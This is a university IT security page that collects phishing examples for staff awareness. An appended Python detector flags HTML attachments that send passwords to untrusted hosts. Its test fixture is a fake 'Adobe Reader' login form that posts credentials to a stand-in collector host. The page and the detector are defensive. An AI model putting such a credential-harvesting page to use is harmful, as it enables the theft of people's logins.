ITS Information Security - Phish Pond

Welcome to the Phish Pond. On this page we'll post screenshots of recently encountered real-world phishing attacks. If you need help identifying phishing, sign up for one of our training sessions, or watch our online training session here. As always, if you find one, report it to: PhishMeNot@holycross.edu

Account Verify Phish - 2017-06-03

posted Jun 5, 2017, 6:48 AM by Greg Rodenhiser   [ updated Jun 5, 2017, 6:49 AM ]

This phish even directed recipients to a Holy Cross branded login page in an attempt to trick them into giving away their login information.

Phishing attack using Google Drive and McAfee URL shortener for legitimacy.

posted May 19, 2017, 10:32 AM by David Shettler

Attackers are realizing that some of us have been trained to read URLs, and not click on suspicious URLs.

In response they've begun filling their phishing emails with links to more trusted resources, such as Google Drive. Then, in a benign Google Drive share, they link you off to somewhere malicious. In this case, we see them using McAfee's URL shortener in an attempt to add legitimacy. Thankfully, in this case, McAfee had already shut the link down by the time we could test it, but be aware that this may not always occur.

Moral of the story: don't blindly trust URL shorteners, and if you receive an email with a file share out of the blue that you were not expecting, and that is "out of character", don't click.







New Docusign Phish - 2017-05-15

posted May 15, 2017, 10:25 AM by David Shettler   [ updated May 15, 2017, 10:29 AM ]



New UPS phish - 2017-05-15

posted May 15, 2017, 10:23 AM by David Shettler


2017 - May 5th - Google Docs grant access phish

posted May 3, 2017, 1:54 PM by Greg Rodenhiser   [ updated May 3, 2017, 1:55 PM ]

This was a very sophisticated phish that tricked a user into thinking a document was being shared with them, got the user to do a legit login to their Google Account, and then requested full access to the Gmail account. Looking at the developer information shows this was not legit.


2017 - April 29th - Attachment that's an Image with link

posted May 1, 2017, 6:26 AM by Greg Rodenhiser

The attachment in this phish was a single image that was also a web link to a likely malicious site. 


2017 - March 13 - Another Ambiguous Link Phish, Same Day

posted Mar 13, 2017, 8:11 AM by Greg Rodenhiser


2017 - March 13 - Ambiguous Link Phish

posted Mar 13, 2017, 8:01 AM by Greg Rodenhiser


2016 - November 23rd - Google Sheets Share Phish

posted Nov 23, 2016, 8:43 AM by Greg Rodenhiser


2016-11-16 - Attachment-based Phishing Attack

posted Nov 18, 2016, 6:09 AM by David Shettler   [ updated Nov 18, 2016, 6:38 AM ]

Here's one that went to a group of us today. Vague, but it got around our filters and Google's filters.

The screenshot doesn't show the attachment, an HTML file that contained malicious JavaScript.




If you open the attachment, you'll see this in your browser:


The browser tries to disguise itself as Adobe Reader and requests your login credentials, which get submitted to a website in Germany.
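
As an added example (not part of the original post or any Holy Cross tooling), here is a filter-side check for the attachment pattern described above: an HTML file that asks for a password and submits it to a host other than your own login server. The `TRUSTED_HOSTS` value, the function names and the sample attachment are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_HOSTS = {"login.example.edu"}  # assumption: your real login host(s)

class _FormScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.forms, self.scripts, self.orphan_password = [], 0, False
        self._current = None  # the <form> we are currently inside, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            if self._current is None:
                self.orphan_password = True  # field would be read and sent by script
            else:
                self._current["password"] = True
        elif tag == "script":
            self.scripts += 1

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def scan_html_attachment(html, trusted_hosts=TRUSTED_HOSTS):
    """Return a list of findings; an empty list means nothing was flagged."""
    p = _FormScanner()
    p.feed(html)
    findings = []
    for form in (f for f in p.forms if f["password"]):
        host = urlparse(form["action"]).hostname
        if host is None:
            findings.append("password form without an absolute action URL")
        elif host not in trusted_hosts:
            findings.append(f"password form posts to untrusted host: {host}")
    if p.orphan_password:
        findings.append("password field outside any form")
    if findings and p.scripts:
        findings.append(f"{p.scripts} script block(s) alongside credential prompt")
    return findings

# Constructed sample attachment, modelled on the description above.
SAMPLE = """<html><head><title>Adobe Reader</title><script>var t = 1;</script></head>
<body><form method="post" action="https://collector.example.net/post.php">
<input type="text" name="email"><input type="password" name="pass"></form></body></html>"""
```

Any non-empty result is a reason to quarantine the message for review; legitimate mail rarely attaches an HTML file that prompts for a password.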
